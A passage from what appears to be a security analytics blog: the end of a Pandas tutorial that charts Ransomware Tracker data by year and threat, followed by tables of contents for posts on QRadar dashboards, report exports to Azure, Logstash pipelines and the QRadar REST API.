ax = df.groupby(['Firstseen_year','Threat']).size().unstack().plot(kind='area',stacked=True,figsize=(20,5))
ax.set_xlabel("Firstseen Year")
ax.set_ylabel("Number of Malware")
ax.set_title("Malware per Threat per Year - Ransomware Tracker")

The above query showcases an area plot described by kind='area' as argument to the function df.plot. The stacking is achieved with the argument stacked=True and makes the graph easier to visualize.

Again, we utilize the set_xlabel and set_ylabel functions to correctly label the graph. This is always recommended!

Conclusion

In this tutorial, we explored Pandas - the defacto Python module in a Data Analyst’s toolkit.

Using the practical example of Ransomware Tracker data, we went through the steps involved in ingesting, cleaning, parsing, querying, and visualizing data to generate powerful insights.

You can view and download a Jupyter Notebook with everything highlighted in this tutorial from here.

Key takeaways include:

Always be curious about data. In Cyber Security, we are surrounded by tons of valuable data - logs, threat intelligence, etc. You never know what you will find.
Leverage modern technologies such as Python, Jupyter Notebooks, GitHub, etc. to write code, visualize graphs, and share with others.
Within Python, explore numerous visualization libraries and modules such as Seaborn, Plotly, Bokeh, Matplotlib, etc. Depending on the scenario, one of them could provide much more value over the other.
Try to correlate with various datasets. For more advanced analytics, play with multiple datasets. In our example, we used only one dataset - Ransomware Tracker feed. In the real-world, you might face multiple datasets. As challenging as it sounds, the reward (insights generated) are usually worth it.

I hope you enjoyed reading this. Please email me with questions.

Arjun

Qradar Dashboards Metabase

Introduction

Pre-requisites

Metabase

CSV Uploads on Metabase

Creating Dashboards

Exporting QRadar Data

Configuring Metabase

Configuring MySQL Database on Metabase

Configuring CSV Uploads on Metabase

Uploading CSVs to Metabase

Questions and Dashboards

Conclusion

Useful Links

Qradar Reports

Introduction

Pre-requisites

Reports in QRadar

Where are QRadar Reports stored?

Azure Blob Storage

Configure Azure Blob Storage

Create Resource Group

Create Storage Account

Create Container

Acquire Connection String

Writing the Script

Installing Azure Blob Storage Client Library for Python

Identify, Parse and Map Reports

Upload Reports to Azure

Version 1 - All reports in one container

Version 2 - Reports organized by year, month, and day

Version 3 - Reports organized by name

Executing the Script

Version 1 on Azure

Version 2 on Azure

Version 3 on Azure

Conclusion

Complete Code

Qradar Logstash

Introduction

Pre-requisites

ETL & Logstash

Logstash Pipeline Configuration

Example #1: QRadar Rules to STDOUT

Input

Filter

Output

Running the Configuration

Example #2: QRadar Log Sources to MongoDB

Input

Filter

Output

Running the Configuration

Example #3: QRadar Offenses to Elasticsearch

Input

Filter

Output

Running the Configuration

Conclusion

Qradar Aql Search Rest Api

Introduction

Pre-requisites

Searching in QRadar

QRadar Ariel Search

Workflow

1. Create a new QRadar Ariel Search using a Saved Search ID or AQL Query

2. A Search ID for the new QRadar Ariel Search is returned

3. Use Search ID to check status of QRadar Ariel Search

4. Use Search ID to retrieve result once QRadar Ariel Search is Completed

QRadar Ariel Search REST API Endpoints

1. Find QRadar Ariel Saved Searches

2. Create QRadar Ariel Search

3. Check Status of QRadar Ariel Search

4. Get Result of QRadar Ariel Search

Python Code

1. do_request function

2. check_status function

Conclusion

Qradar Rest Apis Python

1. `do_request` function

2. `check_status` function

What is `vssadmin`?